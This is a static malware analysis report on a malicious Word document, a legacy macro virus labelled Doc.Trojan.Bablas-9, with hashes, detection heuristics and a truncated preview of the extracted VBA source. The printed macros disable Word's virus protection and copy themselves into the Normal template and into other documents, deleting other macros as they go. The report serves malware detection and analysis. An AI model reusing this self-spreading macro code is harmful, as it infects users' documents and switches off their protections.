Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 cb1a690dd1e2540d…

MALICIOUS

Office (OLE)

96.0 KB Created: 2001-07-02 13:17:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 8d7b12ca04bfa345d0fefd3a9f5d4df7 SHA-1: 54849f816771771a29b89785b475b9c1abfe0cf4 SHA-256: cb1a690dd1e2540d2872222548a5387f57b0ef98affa5934283f95df4e057a29
260 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains legacy WordBasic and VBA macros, including AutoOpen and AutoClose, indicating a macro-based attack. The 'djawara' macro names and comments suggest a custom malware. The 'Lewat' subroutine disables virus protection and save prompts, facilitating further execution. The 'ToolsMacro' subroutine displays a misleading error message to the user.

Heuristics 5

  • ClamAV: Doc.Trojan.Bablas-9 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Bablas-9
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6522 bytes
SHA-256: 28f1651fc54a4dfb9e680f338e0a1370207b7fb1c96a59d315e90060973cd1d8
Detection
ClamAV: Doc.Trojan.Bablas-9
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "djawara"
' djwara macros ... this my first macros
' thank to my company office for editing this garbage
' see you in my next macros project
' may be i will call it bye windows .... :)
Sub header()
Application.ActiveDocument.
End Sub
Sub Lewat()
    Options.SaveNormalPrompt = False
    Options.VirusProtection = False
    Options.SavePropertiesPrompt = False
End Sub
Sub ToolsMacro()
    H = MsgBox("Error Loading Failed.Sys, Please Read Manual.hlp", vbExclamation + vbOKOnly)
End Sub
Sub ViewVbCode()
    If InputBox("Enter Lewatword", "djawara") = "tempe" Then Application.ShowVisualBasicEditor = True
End Sub
Sub FileTemplates()
    ToolsMacro
End Sub
Sub HelpAbout()
    FormSingkat.Show
End Sub
Sub GantiTitle()
    On Error Resume Next
    Application.Caption = "djawara in Action"
    ActiveWindow.Caption = "..."
End Sub
Sub ToolsOptions()
    Options.SaveNormalPrompt = True
    Options.SavePropertiesPrompt = True
    Options.VirusProtection = True
    Dialogs(wdDialogToolsOptions).Show
    Lewat
End Sub
Sub BalikinTitle()
    On Error Resume Next
    Application.Caption = "Microsoft Word"
    ActiveWindow.Caption = ActiveDocument.Name
End Sub
Sub PrayerTime()
    H = Time
    Select Case Time
     Case "04:30:00" To "04:40:00" 'shubuh
       H = MsgBox("Sholat Shubuh dahulu .... nanti terusin lagi", vbOKOnly + vbExclamation, "[djawara auto warning]")
     Case "11:50:00" To "12:00:00" 'dhuhur
       H = MsgBox("Sholat dhuhur dahulu .... nanti terusin lagi", vbOKOnly + vbExclamation, "[djawara auto warning]")
     Case "15:20:00" To "15:30:00" 'ashar
       H = MsgBox("Sholat ashar dahulu .... nanti terusin lagi", vbOKOnly + vbExclamation, "[djawara auto warning]")
     Case "17:50:00" To "18:00:00" 'magrib
       H = MsgBox("Sholat maghrib dahulu .... nanti terusin lagi", vbOKOnly + vbExclamation, "[djawara auto warning]")
     Case "18:40:00" To "19:00:00" 'isya
       H = MsgBox("Sholat isya' dahulu .... nanti terusin lagi", vbOKOnly + vbExclamation, "[djawara auto warning]")
    End Select
End Sub
Sub OpenMyMacro()
    If InputBox("Enter Lewatword", "djawara") = "tempe" Then Application.ShowVisualBasicEditor = True
End Sub
Sub OverRideTemplate()
    Dim NorOk As Boolean
    NorOk = False
    For Each Obj In NormalTemplate.VBProject.VBComponents
        If Obj.Name = "djawara" Then NorOk = True
        If Obj.Name <> "djawara" And Obj.Name <> "FormSingkat" And Obj.Name <> "ThisDocument" Then
            Application.StatusBar = "Deleting " + Obj.Name + _
            " Your Clean File Template,... Please Wait"
            Application.OrganizerDelete Source:=NormalTemplate.FullName, _
            Name:=Obj.Name, Object:=wdOrganizerObjectProjectItems
        End If
    Next Obj
    If NorOk = False Then
        Application.StatusBar = "Copying djawara From " + ActiveDocument.Name + _
        " to Normal Template,... Please Wait"
        Application.OrganizerCopy Source:=ActiveDocument.FullName, _
        Destination:=NormalTemplate.FullName, Name:="djawara", Object:=wdOrganizerObjectProjectItems
        Application.OrganizerCopy Source:=ActiveDocument.FullName, _
        Destination:=NormalTemplate.FullName, Name:="FormSingkat", Object:=wdOrganizerObjectProjectItems
        Application.DisplayRecentFiles = False
        Application.DisplayRecentFiles = True
    End If
End Sub
Sub OverRideDocument()
    Dim DocOk As Boolean
    
    
    DocOk = False
        For Each Obj In ActiveDocument.VBProject.VBComponents
        If Obj.Name = "djawara" Then DocOk = True
        If Obj.Name <> "djawara" And Obj.Name <> "FormSingkat" And Obj.Name <> "ThisDocument" Then
            Application.StatusBar = "Deleting " + Obj.Name + _
            " Macro in " + Active
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.